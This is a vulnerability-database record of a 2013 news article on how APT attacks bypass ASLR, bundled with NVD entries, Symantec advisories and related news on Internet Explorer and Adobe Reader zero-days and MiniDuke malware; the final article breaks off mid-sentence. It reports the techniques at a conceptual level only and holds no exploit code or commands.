{"id": "THN:7ACF921BA3C582C8760C348FD2475BC2", "type": "thn", "bulletinFamily": "info", "title": "ASLR bypass techniques are popular with APT attacks", "description": "[](<http://2.bp.blogspot.com/-w3LwCzj4YXo/Ul6znjNKKPI/AAAAAAAAYHo/lX4eIOqgbds/s1600/ASLR+bypass+techniques+are+popular+with+APT+attacks.jpg>)\n\n[Address space layout randomization (ASLR)](<http://thehackernews.com/search/label/ASLR>) is a security technique involved in protection from buffer overflow attacks. Many recent [APT (Advanced Persistent Threat)](<http://thehackernews.com/search/label/APT>) attacks have utilized many different ASLR bypass techniques during the past year, according to Researchers at [FireEye](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/10/aslr-bypass-apocalypse-in-lately-zero-day-exploits.html>). \n \nMany exploits and malware attacks rely on the ability of the programmer to accurately identify where specific processes or system functions reside in memory. In order for an attacker to exploit or leverage a function, they must first be able to tell their code where to find the function or process to exploit. The [goal of ASLR](<http://thehackernews.com/2012/07/android-security-shielded-with-full.html>) is to introduce randomness into addresses used by a given task. It involves randomly arranging the positions of key data areas of a program, including the base of the executable and the positions of the stack, heap, and libraries, in a process's address space. \n\n \n\n\nToday a lot of attention is brought to client side exploits especially inside [web browsers](<http://thehackernews.com/search/label/web%20browser>). Normally the exploitation is done through the oldest known method of spraying the heap. \n \nAccording to Researchers, the easiest and most popular way to defeat ASLR protection is - loading a non-ASLR module. Such attacks were recently used in [Internet Explorer](<http://thehackernews.com/search/label/Internet%20Explorer>) (IE) Zero-Day Exploit CVE-2013-3893 and some other [vulnerabilities](<http://thehackernews.com/search/label/Vulnerability>) i.e. CVE2013-1347, CVE-2012-4969, CVE-2012-4792. \n \nBut there is a limitation that the non-ASLR module technique requires that IE 8 and IE 9 must be running with old software such as JRE 1.6, Office 2007/2010.\n\n \nAnother ASLR bypass technique involves the modification of the BSTR length/null terminator. But this technique only applies to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing/decreasing the content of a memory pointer. The Adobe XFA [0day exploit](<http://thehackernews.com/search/label/zero%20day>) (CVE-2013-0640) uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and [DEP](<http://thehackernews.com/search/label/DEP>). \n \n\"_The good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR such that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it may then use the same memory corruption bug to control EIP._\" \n \nAccording to Microsoft, these types of bugs typically use [JavaScript](<http://thehackernews.com/search/label/JavaScript%20code>) to trigger the flaw, as well as heap-spray to abuse the memory, and bypass ASLR. ASLR bypassing has become more and more common in Zero-Day attacks.\n", "published": "2013-10-16T04:42:00", "modified": "2013-10-16T15:45:43", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "http://thehackernews.com/2013/10/aslr-bypass-techniques-are-popular-with.html", "reporter": "Mohit Kumar", "references": [], "cvelist": ["CVE-2012-4969", "CVE-2013-0640", "CVE-2012-4792", "CVE-2013-3893"], "lastseen": "2017-01-08T18:01:14", "history": [], "viewCount": 47, "enchantments": {"score": {"value": 9.0, "vector": "NONE", "modified": "2017-01-08T18:01:14"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-4969", "CVE-2013-3893", "CVE-2012-4792", "CVE-2013-0640"]}, {"type": "symantec", "idList": ["SMNTC-62453", "SMNTC-57931", "SMNTC-57070"]}, {"type": "thn", "idList": ["THN:5ACF233F4E37E6A4975B246F2082107C", "THN:7772BB7645946AB66D9B3F9358082C11", "THN:D6BA201E74018A71C342FC55FFDD18A0", "THN:652653D945C00F48ED829424A45D3937", "THN:29FFDF713AB47B0B4A5A40C208CF0BEF", "THN:A27DF5E371A39A7B4C6BA19A7BD3D4BA", "THN:1A9D68675814428FB1A1DD8C3778BCF1", "THN:9D18A086B8C1E6B01851C09B70F5A04C"]}, {"type": "seebug", "idList": ["SSV:61034", "SSV:60551", "SSV:82516", "SSV:83356"]}, {"type": "threatpost", "idList": ["THREATPOST:B4DB3D0667E712349DDF7EF229F2D543", "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "THREATPOST:0F39C75CE601A68EFCAA9B0C7713E32B", "THREATPOST:F8901D712353053F8617BC6F33688637", "THREATPOST:315D1B272F5920E57478E9A5E27C5EFC", "THREATPOST:4E6C8CF00D7C082D8B3A4314BBFD35A6", "THREATPOST:1699EFD514DA7A82DC9285D3892F61AE", "THREATPOST:39F4459D592F1F044F7A11772E4B8ACE", "THREATPOST:37FD3A8A338F59D00D9F7966AFF5067F", "THREATPOST:25B894F4D6E2F383F6DFAD86A27454B8"]}, {"type": "saint", "idList": ["SAINT:D9A07373E169F8C48267AC930C4D49AB", "SAINT:C8A99119E3B66AE618442F25E6C3A18D", "SAINT:AE7EA3E507E47C6D0227B892372736BE", "SAINT:A85CFBC6927213488530ECDD18E63DF7", "SAINT:04BD9122E7584A49B7BA167BCE00F13E", "SAINT:AA6CF686B616406A4115C9EBD9C6048C", "SAINT:E4225C669F34358E2FC7EE71D604FA0A", "SAINT:2EF245955FDA0606FF9A743D9132C6A8", "SAINT:DCB95B394157102378C2A8CADFE280E8"]}, {"type": "zdi", "idList": ["ZDI-12-199"]}, {"type": "canvas", "idList": ["IE_EXECCOMMAND", "ACROBAT_XFA"]}, {"type": "nessus", "idList": ["SMB_KB2757760.NASL", "SMB_KB2887505.NASL", "SMB_KB2794220.NASL", "SMB_NT_MS13-008.NASL", "MACOSX_ADOBE_READER_APSB13-07.NASL", "OPENSUSE-2013-151.NASL", "ADOBE_ACROBAT_APSB13-07.NASL", "SUSE_11_ACROREAD-130222.NASL", "ADOBE_READER_APSA13-02.NASL", "ADOBE_READER_APSB13-07.NASL"]}, {"type": "cert", "idList": ["VU:480095", "VU:154201", "VU:422807"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/IE_EXECCOMMAND_UAF", "MSF:EXPLOIT/WINDOWS/BROWSER/IE_SETMOUSECAPTURE_UAF", "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CBUTTON_UAF", "MSF:EXPLOIT/WINDOWS/BROWSER/MS13_080_CDISPLAYPOINTER"]}, {"type": "exploitdb", "idList": ["EDB-ID:21840", "EDB-ID:28682", "EDB-ID:23754", "EDB-ID:23785", "EDB-ID:29881"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123457", "PACKETSTORM:119186", "PACKETSTORM:119168", "PACKETSTORM:123603"]}, {"type": "zdt", "idList": ["1337DAY-ID-21313", "1337DAY-ID-20069"]}, {"type": "jvn", "idList": ["JVN:27443259"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12835", "SECURITYVULNS:VULN:12924"]}, {"type": "openvas", "idList": ["OPENVAS:902699", "OPENVAS:1361412562310902699", "OPENVAS:1361412562310803418", "OPENVAS:850408", "OPENVAS:1361412562310850409", "OPENVAS:803419", "OPENVAS:1361412562310803416", "OPENVAS:850409", "OPENVAS:1361412562310803417", "OPENVAS:1361412562310850408"]}, {"type": "suse", "idList": ["SUSE-SU-2013:0349-1", "OPENSUSE-SU-2013:0335-2", "OPENSUSE-SU-2013:0342-1", "OPENSUSE-SU-2013:0335-1"]}, {"type": "redhat", "idList": ["RHSA-2013:0551"]}], "modified": "2017-01-08T18:01:14"}, "vulnersScore": 9.0}, "objectVersion": "1.4", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:12:25", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in the CMshtmlEd::Exec function in mshtml.dll in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site, as exploited in the wild in September 2012.", "modified": "2017-11-21T18:13:00", "id": "CVE-2012-4969", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4969", "published": "2012-09-18T10:39:00", "title": "CVE-2012-4969", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.", "modified": "2018-10-12T22:05:00", "id": "CVE-2013-3893", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3893", "published": "2013-09-18T10:08:00", "title": "CVE-2013-3893", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:12:25", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012.", "modified": "2019-02-26T14:04:00", "id": "CVE-2012-4792", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792", "published": "2012-12-30T18:55:00", "title": "CVE-2012-4792", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:12:59", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.4, 10.x before 10.1.6, and 11.x before 11.0.02 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted PDF document, as exploited in the wild in February 2013.", "modified": "2017-09-19T01:35:00", "id": "CVE-2013-0640", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640", "published": "2013-02-14T01:55:00", "title": "CVE-2013-0640", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-03-11T20:41:46", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Internet Explorer versions 6, 7, 8, 9, 10, and 11 are affected.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing Standard \n * Avaya CallPilot \n * Avaya Communication Server 1000 Telephony Manager \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2013-09-17T00:00:00", "published": "2013-09-17T00:00:00", "id": "SMNTC-62453", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/62453", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2013-3893 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T00:30:53", "bulletinFamily": "software", "description": "### Description\n\nAdobe Acrobat and Reader are prone to an unspecified remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application or to crash the application. Limited information is known about this issue. We will update this BID as soon as more information becomes available. Adobe Acrobat and Reader versions 11.0.1 and prior are vulnerable.\n\n### Technologies Affected\n\n * Adobe Acrobat (for Macintosh) 10.1.5 \n * Adobe Acrobat (for Macintosh) 11.0.1 \n * Adobe Acrobat (for Macintosh) 9.5.3 \n * Adobe Acrobat (for Windows) 10.1.5 \n * Adobe Acrobat (for Windows) 11.0.1 \n * Adobe Acrobat (for Windows) 9.5.3 \n * Adobe Acrobat 10.0 \n * Adobe Acrobat 10.0.1 \n * Adobe Acrobat 10.0.2 \n * Adobe Acrobat 10.0.3 \n * Adobe Acrobat 10.1 \n * Adobe Acrobat 10.1.1 \n * Adobe Acrobat 10.1.2 \n * Adobe Acrobat 10.1.3 \n * Adobe Acrobat 10.1.4 \n * Adobe Acrobat 11.0.0 \n * Adobe Acrobat 9.5 \n * Adobe Acrobat 9.5.1 \n * Adobe Acrobat 9.5.2 \n * Adobe Acrobat Reader (for Macintosh) 9.5.3 \n * Adobe Reader (for Macintosh) 10.0.1 \n * Adobe Reader (for Macintosh) 10.1.5 \n * Adobe Reader (for Windows) 10.0.1 \n * Adobe Reader (for Windows) 10.1.5 \n * Adobe Reader (for Windows) 9.5.3 \n * Adobe Reader 10.0 \n * Adobe Reader 10.0.1 \n * Adobe Reader 10.0.2 \n * Adobe Reader 10.0.3 \n * Adobe Reader 10.1 \n * Adobe Reader 10.1.1 \n * Adobe Reader 10.1.2 \n * Adobe Reader 10.1.3 \n * Adobe Reader 10.1.4 \n * Adobe Reader 11.0 \n * Adobe Reader 11.0.1 \n * Adobe Reader 9.5 \n * Adobe Reader 9.5.1 \n * Adobe Reader 9.5.2 \n * Gentoo Linux \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE Suse Linux Enterprise Desktop 10 SP4 \n * SuSE Suse Linux Enterprise Desktop 11 SP2 \n * SuSE openSUSE 11.4 \n * SuSE openSUSE 12.1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run all applications with the minimal amount of privileges required for functionality. \n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of successful exploits, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2013-02-12T00:00:00", "published": "2013-02-12T00:00:00", "id": "SMNTC-57931", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/57931", "type": "symantec", "title": "Adobe Acrobat And Reader CVE-2013-0640 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T06:16:35", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Microsoft Internet Explorer versions 6, 7, and 8 are affected.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nVendor fixes are available. Please see the references for more information.\n", "modified": "2012-12-30T00:00:00", "published": "2012-12-30T00:00:00", "id": "SMNTC-57070", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/57070", "type": "symantec", "title": "Microsoft Internet Explorer 'CDwnBindInfo' Use-After-Free Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2017-01-08T18:01:27", "bulletinFamily": "info", "description": "[](<http://4.bp.blogspot.com/-N6kVGzv51Vo/UOQmpOx7p0I/AAAAAAAAQ8s/GkB-QlW_qk8/s1600/CFR+watering+hole+attack+also+target+Capstone+Turbine+Corporation.png>)Last week [Council on Foreign Relations website was compromised](<http://thehackernews.com/2012/12/chinese-hackers-exploiting-internet.html>) and recently hit by a drive-by attack using a zero day Internet Explorer 6 vulnerability for Cyber Espionage attack, suspected by Chinese Hackers. Later Microsoft confirmed that [Internet Explorer 6, 7, and 8 are vulnerable](<http://thehackernews.com/2012/12/internet-explorer-6-7-and-8-vulnerable.html>) to remote code execution hacks.\n\n \n\n\nAccording to researcher [Eric Romang](<http://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/>), CFR watering hole attack (CVE-2012-4969 and CVE-2012-4792) has also target Capstone Turbine Corporation website since mid-September. He was able to find a [cached version of the first JavaScript](<http://pastebin.com/PuM8GMeb>) that starts the drive-by attack. Then on further search finds that by doing a Google dork search **_site:capstoneturbine.com \u201c_include\u201d_** we can see something strangely like CFR.org \u201cnews_14242aa.html\u201c file.\n\n \n\n\nCapstone Turbine Corporation is the world\u2019s leading producer of low-emission microturbine systems, and was first to market with commercially viable microturbine energy products. Capstone Turbine has shipped thousands of Capstone MicroTurbine systems to customers worldwide.\n\n \n\n\nJindrich Kubec director of Threat Intelligence at avast [confirm](<https://twitter.com/Jindroush/statuses/286268899010416640>) the presence of exploit in September on Capstone Turbine Corporation, \"_I wrote to Capstone Turbine on 19th Sep about the Flash exploit stuff they were hosting. They never replied. And also not fixed_\"\n\n \n\n\nEric shows many valid proofs from **_[urlQuery](<http://urlquery.net/report.php?id=551220>)_** and **_VirusTotal _**results that can confirm the presence of hacks on this new target and he suggest, \"_Potentially the guys behind CVE-2012-4969 and CVE-2012-4792 are the same_.\"\n\n \n\n\nFortunately, Microsoft have come up a patch and therefore the new year will be having a safe start after all.\n", "modified": "2013-01-11T18:02:27", "published": "2013-01-02T01:23:00", "id": "THN:5ACF233F4E37E6A4975B246F2082107C", "href": "http://thehackernews.com/2013/01/cfr-watering-hole-attack-also-target.html", "type": "thn", "title": "CFR watering hole attack also target Capstone Turbine Corporation", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:15", "bulletinFamily": "info", "description": "[](<http://2.bp.blogspot.com/-0cBjOV5dm2Y/UkGas9loy-I/AAAAAAAAXrk/36OsgDBdC2s/s1600/Internet+Explorer+zero-day+exploit+used+watering+hole+attacks+to+target+Japanese+users.jpg>)\n\nAttackers exploiting a zero-day vulnerability [CVE-2013-3893](<http://thehackernews.com/2013/09/microsoft-issues-emergency-fix-for_18.html>) in Microsoft\u2019s [Internet Explorer ](<http://thehackernews.com/search/label/Internet%20Explorer>)browser and served them on compromised popular Japanese news websites.\n\n \n\n\nAccording to [FireEye](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html>), at least three major Japanese media websites were compromised in watering hole attacks, dubbed **_Operation DeputyDog_**, appears to target manufacturers, government entities and media organizations in Japan.\n\nThe compromised sites recorded more than 75,000 page views before the exploits were discovered. The [zero-day vulnerability](<http://thehackernews.com/search/label/zero-day>) in IE 8 and 9 allows the stealthy installation of software in the users\u2019 computers which then can be remotely accessed by the hackers.\n\n \n\n\nThe hackers typically use Trojans designed specifically for a pay-to-order attack to steal intellectual property. Researchers saw a payload executable file used against a Japanese target posing as an image file hosted on a Hong Kong server.\n\n \n\n\nThe attack in Japan was discovered two days after Microsoft disclosed the flaw ,\u201c_The exploit was attacking a Use After Free vulnerability in IE\u2019s HTML rendering engine (mshtml.dll) and was implemented entirely in Javascript (no dependencies on Java, Flash etc.), but did depend on a Microsoft Office DLL which was not compiled with ASLR (Address Space Layout Randomization) enabled,_\u201d Microsoft [Security Advisory](<http://technet.microsoft.com/security/advisory/2887505>).\n\n \n\n\nFireEye also claimed the group responsible for DeputyDog is the same one that compromised security firm Bit9 back in February 2013. FireEye did not disclose which sites were infected, but said that Japanese computer security authorities were working with the media outlets to remediate the issue.\n\n \n\n\nMicrosoft released a [FixIt tool](<http://support.microsoft.com/kb/2887505>) and urged IE users to install that as a mitigation until a patch was ready.\n", "modified": "2013-09-24T14:02:21", "published": "2013-09-24T03:02:00", "id": "THN:7772BB7645946AB66D9B3F9358082C11", "href": "http://thehackernews.com/2013/09/internet-explorer-zero-day-exploit-used.html", "type": "thn", "title": "Internet Explorer zero-day exploit used watering hole attacks to target Japanese users", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:15", "bulletinFamily": "info", "description": "All supported versions of Internet Explorer are vulnerable to a zero-day Exploit that is currently being exploited in targeted attacks against IE 8 and IE 9, dubbed \"_**CVE-2013-3893 MSHTML Shim Workaround**_\".\n\n \n\n\nMicrosoft confirmed that the flaw was unknown before the attacks and that it is already working on an official patch, meantime Microsoft [released](<http://blogs.technet.com/b/msrc/archive/2013/09/16/microsoft-releases-security-advisory-2887505.aspx>) an emergency software fix for Internet Explorer (IE) Web browser.\n\n \n\n\n[](<http://2.bp.blogspot.com/--bEp_S7N2hc/Ujm3iQW0wWI/AAAAAAAAXoI/Ou_XtRoqQjA/s1600/Microsoft+issues+Emergency+Fix+for+Internet+Explorer+zero-day+exploit.jpg>)\n\nAdvisory noted that Microsoft is investigating public reports of a remote code execution vulnerability in Internet Explorer.\n\n \n\n\nThis issue could allow remote code execution if an affected system browses to a website containing malicious content directed towards the specific browser type. Victims could be infected despite the adoption of all necessary countermeasures due the nature of the flaw previously unknown.\n\n \n\n\nThe flaw that has been recently targeted by hackers during attacks is considerable serious and complicated to fix. State-sponsored hacking groups are often willing to pay hundreds of thousands of dollars for zero-day vulnerabilities in widely used software such as Internet Explorer.\n\n \n\n\nIn the specific case if the attacker successfully exploited the zero-day vulnerability could gain the same user rights as the current user, due this reason MS confirmed that whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\n \n\n\nMicrosoft's advisory also says that EMET (the [Enhanced Mitigation Experience Toolkit](<http://technet.microsoft.com/security/jj653751/>)) may be used to mitigate against the vulnerability.\n", "modified": "2013-09-18T14:26:10", "published": "2013-09-18T03:26:00", "id": "THN:D6BA201E74018A71C342FC55FFDD18A0", "href": "http://thehackernews.com/2013/09/microsoft-issues-emergency-fix-for_18.html", "type": "thn", "title": "Microsoft issues Emergency Fix for Internet Explorer zero-day exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:14", "bulletinFamily": "info", "description": "October is turning out to be a busy month for patches. This month also marks the 10-year anniversary of the [Patch Tuesday](<http://thehackernews.com/search/label/patch%20Tuesday>) program, which Microsoft started in October of 2003. \n \nScheduled for tomorrow, Microsoft has announced that they will release eight security updates including four critical, addressing vulnerabilities in Microsoft Windows, [Internet Explorer ](<http://thehackernews.com/search/label/Internet%20Explorer>)(IE), Microsoft Office and its other products.\n\n \n\n\n[](<http://2.bp.blogspot.com/-Zr-QF-HOlBY/UlK97ZWSeBI/AAAAAAAAX_M/kkoH3ly2wdI/s1600/Microsoft+Patch+Tuesday+-+8+Security+Updates,+4+critical+vulnerabilities,+including+Internet+Explorer+zero-day.jpg>)Bulletin 1 is almost certainly to a [zero-day vulnerability](<http://thehackernews.com/search/label/zero%20day>) [CVE-2013-3893](<http://thehackernews.com/2013/09/internet-explorer-zero-day-exploit-used.html>) that has been actively exploited by hackers in targeted attacks. Though Microsoft issued a temporary \"[Fix it](<http://thehackernews.com/2013/09/microsoft-issues-emergency-fix-for_18.html>)\" in September for the vulnerability,\n\n \n\n\nBulletins 2, 3 and 4 address vulnerabilities in a wide range of Microsoft products, including Windows XP, 7 and 8, and Windows Server 2003, 2008 and 2012. \n \n\n\nBulletins 5, 6 and 7 address vulnerabilities that could allow for [remote code execution](<http://thehackernews.com/search/label/remote%20code%20execution>). Bulletin 8 addresses an information disclosure [vulnerability](<http://thehackernews.com/search/label/Vulnerability>) in SIlverlight and is the least urgent of the eight patches.\n\n \n\n\nMicrosoft's [pre-release](<http://technet.microsoft.com/en-us/security/bulletin/ms13-oct>) notice provides more details of the affected software packages.\n\n \n\n\n[Adobe](<http://thehackernews.com/2013/10/adobe-gets-hacked-hackers-steal-29.html>) will also be releasing [updates on Tuesday](<http://www.adobe.com/support/security/bulletins/apsb13-25.html>) for Reader XI and Acrobat XI for Windows. Both are rated 2, which means it's a critical vulnerability, but not known to be in use.\n\n \n\n\n \n\n", "modified": "2013-10-07T14:32:46", "published": "2013-10-07T02:59:00", "id": "THN:652653D945C00F48ED829424A45D3937", "href": "http://thehackernews.com/2013/10/October-Patch-Tuesday-Internet-Explorer-zero-day.html", "type": "thn", "title": "Microsoft Patch Tuesday - 8 Security Updates, 4 critical vulnerabilities, including Internet Explorer zero-day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:39", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-T4arGTrtEHE/UzvW_OMRc1I/AAAAAAAAa-g/VEb1Lch53ws/s1600/malware-campiagn-miniduke-cyberattack.jpg>)\n\nA year back, Security Researchers from the Antivirus firm _Kaspersky_ found a sophisticated piece of malware which they dubbed as \u2018**MiniDuke**\u2019, designed specifically to collect and steal strategic insights and highly protected political information, which is a subject to states\u2019 security.\n\n \n\n\nNow, once again the MiniDuke virus is spreading in wild via an innocent looking but fake PDF documents related to _**Ukraine**_, while the researcher at [F-Secure](<http://www.f-secure.com/weblog/archives/00002688.html>) were browsing the set of extracted decoy documents from a large batch of potential MiniDuke Samples.\n\n \n\n\n\"_This is interesting considering the current crisis in the area_,\" Mikko Hypponen, the CTO of security research firm F-Secure, wrote on Tuesday.\n\n \n\n\n_The Hacker News_ [reported](<https://thehackernews.com/2013/03/old-school-hackers-spying-on-european.html>) a year ago about the malicious malware that uses an exploit (_CVE-2013-0640_) of the famous and actively used [Adobe Reader](<https://thehackernews.com/search/label/Adobe%20Reader>). MiniDuke malware written in assembly language with its tiny file size (20KB), and uses hijacked Twitter accounts for Command &amp; Control and incase twitter accounts are not active, the malware located backup control channels via Google searches.\n\n \n\n\nThe malware consists of three components: _PDF file, MiniDuke Main and Payloa_d. Payload is dropped after the Adobe process gets exploited by opening the malicious PDF file, which refers to the topics including human rights, Ukraine's foreign policy, and NATO membership plans.\n\n \n\n\nThe infected machine then use Twitter or Google to collect encrypted instructions showing them where to report for new backdoors and as soon as infected system connects the command servers, it starts receiving encrypted backdoors through GIF image files. Once installed, it may copy, remove, delete files, create database, stop the processes and download the new ones, that may also open backdoor access to other Trojans.\n\n \n\n\nF-Secure also provided screenshots of several Ukraine-related documents that were more likely twisted from already existing and real public documents.\n\n[](<https://2.bp.blogspot.com/-tZTopyueCAg/UzvKuVSCrfI/AAAAAAAAa-Q/2NFn04pRaK0/s1600/Ukraine-malware.jpg>)\n\nF-Secure found a bogus document signed by Ruslan Demchenko, the First Deputy Minister for Foreign Affairs of Ukraine. \u201c_The letter is addressed to the heads of foreign diplomatic institutions in Ukraine._\u201d When the researcher translated the document, it comes out to be a note regarding \u201c_the 100th year anniversary of the 1st World War._\u201d\n\n \n\n\nThis also signalized that the attackers have somehow access to the Ukrainian Ministry of Foreign Affairs. \u201c_We don't know where the attacker got this decoy file from_,\u201d Hypponen wrote. \u201c_We don't know who was targeted by these attacks. We don't know who's behind these attacks. What we do know is that all these attacks used the CVE-2013-0640 [vulnerability](<https://thehackernews.com/search/label/Vulnerability>) and dropped the same backdoor (compilation date 2013-02-21)_.\u201d\n\n \nThe authors of MiniDuke made the malware familiar with 